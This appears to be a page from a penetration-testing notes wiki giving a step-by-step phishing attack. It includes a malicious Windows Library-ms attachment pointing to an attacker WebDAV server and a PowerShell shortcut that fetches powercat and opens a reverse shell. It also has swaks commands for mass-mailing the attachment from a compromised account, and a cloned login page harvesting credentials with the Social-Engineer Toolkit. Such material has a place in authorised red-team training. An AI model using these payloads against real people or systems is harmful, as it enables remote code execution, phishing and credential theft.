Phising

Attachment

Create a malicious attachment (config.Library-ms) and include the attacker host's IP address within the <url> tags (line 15):

Create the attachment on a Windows host!

Library-ms is a Windows-specific file format, and it must follow a specific XML structure with Windows metadata.
If it is created it on Linux, even with the same contents, it might not be recognized or executed properly by Windows.

config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://172.16.42.42</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Create a malicious PowerShell shortcut pointing first to an attacker-controlled HTTP server and then to an attacker-controlled listener:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker_IP>:8000/powercat.ps1');powercat -c <attacker_IP> -p 4444 -e powershell"

Transfer both files to the attacking host under /webdav and start the server from within that directory:

# List the directory's contents 
$ ls
config.Library-ms  powershell.lnk

# Start the WEBDAV server
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=./ --auth=anonymous

Start the HTTP server and the listener:

# List the directory's contents 
$ ls
powercat.ps1

# Start the HTTP server
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

# Start the listener
$ sudo nc -lnvp 4444

Send the phising email along with the malicious attachment:

# Send the phising email to jim
$ swaks --to target@example.com --from compromized-email@example.com --header "Subject: Important!!!" --body @body.txt --attach @config.Library-ms --server 192.168.X.189 --auth LOGIN --auth-user compromized-email@example.com --auth-password 'Pass123!'

# Multiple targets
$ swaks --to $(cat emails.txt | tr '\n' ',') --from compromized-email@example.com --header "Subject: Important!!!" --body @body.txt --attach @config.Library-ms --server 192.168.X.189 --auth LOGIN --auth-user compromized-email@example.com --auth-password 'Pass123!'

Site Clone

The below process can be often simplified by just sending the phishing email(s) and launching a nc listener!

Example HTML code for a login page which can be hosted on Apache2 for set to clone:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Simple Login</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f2f2f2;
      display: flex;
      height: 100vh;
      justify-content: center;
      align-items: center;
    }
    .login-container {
      background: white;
      padding: 20px 30px;
      border-radius: 6px;
      box-shadow: 0 2px 6px rgba(0,0,0,0.2);
      width: 300px;
    }
    h2 {
      margin-bottom: 20px;
      text-align: center;
    }
    label {
      display: block;
      margin-top: 10px;
      margin-bottom: 5px;
      font-weight: bold;
    }
    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 8px;
      border-radius: 4px;
      border: 1px solid #ccc;
      box-sizing: border-box;
    }
    button {
      width: 100%;
      padding: 10px;
      margin-top: 15px;
      background-color: #4CAF50;
      color: white;
      border: none;
      border-radius: 4px;
      font-size: 16px;
      cursor: pointer;
    }
    button:hover {
      background-color: #45a049;
    }
  </style>
</head>
<body>
  <div class="login-container">
    <h2>Login</h2>
    <form action="/login" method="POST">
      <label for="username">Username</label>
      <input type="text" id="username" name="username" required />

      <label for="password">Password</label>
      <input type="password" id="password" name="password" required />

      <button type="submit">Login</button>
    </form>
  </div>
</body>
</html>

The Social Engineering Toolkit can be used to automate the process:

We can manually run setoolkit and select the options Social-Engineering Attacks → Website Attack Vectors > Credential Harvester Attack > Site Cloner.

We can also the above choices and required input using seautomate:

$ cat set_commands.txt
1
2
3
2
10.10.14.15
https://example.com/login.aspx

$ sudo ./seautomate set_commands.txt
...
[*] Cloning the website: https://example.com/login.aspx
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

We can then send our phising email:

swaks --to sales@domain.com --from it@domain.com --server 10.13.14.15 --port 25 --body @email_body.txt

$ sudo ./seautomate set_commands.txt
...
[*] Information will be displayed to you as it arrives below:
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: LoginType=Explicit
POSSIBLE USERNAME FIELD FOUND: user=username123
POSSIBLE PASSWORD FIELD FOUND: password=Password123!
PARAM: domain=LAB.LOCAL
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

PreviousSocial Engineering NextWeb

Last updated 19 days ago

Was this helpful?